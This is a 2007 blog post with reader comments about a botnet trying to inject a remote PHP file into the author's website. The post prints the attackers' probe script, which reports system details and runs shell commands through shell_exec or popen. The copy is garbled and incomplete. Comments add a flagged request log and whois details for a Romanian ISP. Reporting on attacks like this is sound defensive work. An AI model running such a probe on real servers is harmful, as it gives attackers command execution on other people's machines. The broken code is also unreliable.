Sunday, October 28, 2007

Hackers Try Another Botnet Attack

Here we go again with the hackers making another run at one of my websites trying to inject PHP code into a site that doesn't even have PHP enabled which is amusing at best.

The script they were trying to inject was located here:,/n?
Here's a copy of their PHP script for your viewing pleasure:
$ker = @php_uname();
$osx = @PHP_OS;
echo "f7f32504cabcb48c21030c024c6e5c1a<br>"; // md5('xeQt');
echo "Uname:$ker<br>";
echo "SySOs:$osx<br>";
if ($osx == "WINNT") { $xeQt="ipconfig -a"; }
else { $xeQt="id"; }
echo $hitemup;
function ex($cfe)
$res = '';
if (!empty($cfe))
$res = join("\n",$res);
$res = @shell_exec($cfe);
$res = @ob_get_contents();
$res = @ob_get_contents();
elseif(@is_resource($f = @popen($cfe,"r")))
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
return $res;
Here's a list of IP's with reverse DNS of the botnet involved with the attack so you can get an idea that any machine can be infected, it's pretty random:
not found: 3(NXDOMAIN)
not found: 3(NXDOMAIN)
;; connection timed out; no servers could be reached

Pretty random list of sites infected with this botnet from locations throughout the world.

The bot blocker shut down all these attempts but I wonder what they'll try next time?


Jeremy said...

What did the script do?

What kind of site was it?

IncrediBILL said...

The site was hacked, they weren't involved.

The script is a type of shell script, the entry way into the server, it's a probe.

Ban Proxies said...

I ran this search else { $xeQt="id"; }.

I'm very curious what OS those hacked boxes are running.

Ban Proxies said...

Google Wireless Transcoder being used in a hacking attempt.

Log File
- Request contained a malicious JavaScript or SQL injection attack

- GET /node/4124#comment-501 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Encoding: gzip Accept-Language: en-us Cookie: PHPSESSID=554c98325f86ae95927204be27b834bc; bb2_screener_=1195063773+ Host: Referer: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3; IEMB3) X-Forwarded-For: X-moz: prefetch

IP Whois = - - [20/May/2007:12:38:06 +0200] "GET /images/cs.gif HTTP/1.1" 200 546 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Google Wireless Transcoder;)"

This is the hacker:
inetnum: -
descr: SC UPC Romania SA
descr: str. Herastrau 17
descr: Bucuresti 1
country: ro
admin-c: AH1598-RIPE
tech-c: MA190-RIPE
remarks: Registered trough
mnt-by: RO-MNT
mnt-lower: RO-MNT
source: RIPE Filtered
person: Astral Telecom Hostmaster
address: Astral Telecom SA
address: ROMANIA
phone: 40 264 414688
fax-no: 40 264 414687

I blocked about 6 months ago and the garbage still got through.